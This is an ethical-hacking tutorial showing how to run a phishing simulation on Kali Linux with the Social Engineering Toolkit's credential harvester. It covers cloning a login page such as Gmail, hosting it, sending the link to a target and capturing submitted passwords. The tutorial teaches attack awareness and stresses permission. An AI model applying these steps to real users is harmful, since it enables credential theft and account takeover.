Hands-on: Simulasi Phishing Attack (en)
Here is an explanation and example of a Phishing Attack simulation using Kali Linux 2024.3 in the context of an ethical hacking course.
Phishing Attack Overview
Phishing is a social engineering attack technique in which an attacker tricks a victim into providing sensitive information such as usernames, passwords, or credit card details through a fake website that appears legitimate. This simulation uses the Social Engineering Toolkit (SET) which is already installed on Kali Linux.
Hands-on Steps: Phishing Attack Simulation on Kali Linux 2024.3
1. Open Kali Linux and Run Social Engineering Toolkit (SET)
SET is a powerful tool for simulating social engineering-based attacks such as phishing. Run the following command to get started:
sudo setoolkit
The SET interface will appear with several options. Select the first option for social engineering attacks.
2. Select Website Attack Vectors
In the SET main menu, select option 2 for *Website Attack Vectors*:
2) Website Attack Vectors
3. Select Credential Harvester Attack Method
Next, select the Credential Harvester method:
3) Credential Harvester Attack Method
This method will capture the credentials (username and password) entered by the victim on the phishing site.
4. Select Site Cloner
To create a fake site that looks like the original site, select the Site Cloner option:
2) Site Cloner
5. Enter Target URL
After selecting Site Cloner, you are asked to enter the URL of the site you want to clone (e.g., Facebook login page, Gmail, etc.). For example, to fake the Gmail login page, type:
6. IP Address Configuration
SET will ask for the IP address of your phishing server (the computer that SET will run on). To get the IP address, run the command:
ifconfig
Then enter the IP address into SET when prompted.
7. Start Phishing Server
Once all the configurations are complete, SET will start a local phishing server that can be accessed by the target. Every time the victim visits the phishing URL and enters their credentials, SET will capture the information.
8. Simulate Attack
- Send the generated URL to the target via email, message, or other method. Make sure you have the target's permission, as this is part of ethical hacking.
- When the victim visits the fake site and enters their credentials, this information will be captured by SET and displayed in your Kali Linux terminal.
9. Capture and Display Credentials
On the SET screen, you will see the results of successfully captured credentials:
[*] WE GOT A HIT! POST Data: user=exampleuser&pass=examplepassword
Here, the victim's username and password have been successfully obtained from the fake login page.
Ethical Practices
Phishing is a dangerous attack method if misused. In the context of ethical hacking, this simulation should be done with legitimate permission and only for educational or security testing purposes.
Conclusion
The phishing attack simulation using Kali Linux 2024.3 and Social Engineering Toolkit (SET) provides a real-world view of how this attack is carried out. It is a great way to learn the important aspects of social engineering and helps raise awareness about cybersecurity among internet users.